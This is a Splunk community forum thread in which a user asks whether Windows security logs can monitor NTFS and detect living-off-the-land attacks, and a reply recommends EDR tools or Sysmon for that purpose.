Deployment Architecture

Windows logs- Do security logs also help to monitor NTFS?

debjit_k
Path Finder

Hi, 

Hope you are doing good just have 1 doubt..

On our Splunk windows, we have onboarded the security logs, so my doubt is does security logs also help to monitor NTFS 

 

Thanks 

Debjit 

Labels (2)
0 Karma

johnhuang
Motivator

There's windows event logs do not monitor NTFS. You may be able get kerberos auth to fileshares but thats about it.

0 Karma

debjit_k
Path Finder

Hi 

So what kind of logs can have NTFS. Actually I want to monitor LOL attacks.

Kindly guide me if we can create any UC using windows security logs for LOL attacks 

 

Thanks 

0 Karma

johnhuang
Motivator

For LOL or “Living off the Land" attacks, the ideal tool is an EDR/HIDS solution that provides you with raw logs, e.g. Carbonblack, or Sysmon which is free.

0 Karma
Get Updates on the Splunk Community!

.conf24 | Day 0

Hello Splunk Community! My name is Chris, and I'm based in Canberra, Australia's capital, and I travelled for ...

Enhance Security Visibility with Splunk Enterprise Security 7.1 through Threat ...

(view in My Videos)Struggling with alert fatigue, lack of context, and prioritization around security ...

Troubleshooting the OpenTelemetry Collector

  In this tech talk, you’ll learn how to troubleshoot the OpenTelemetry collector - from checking the ...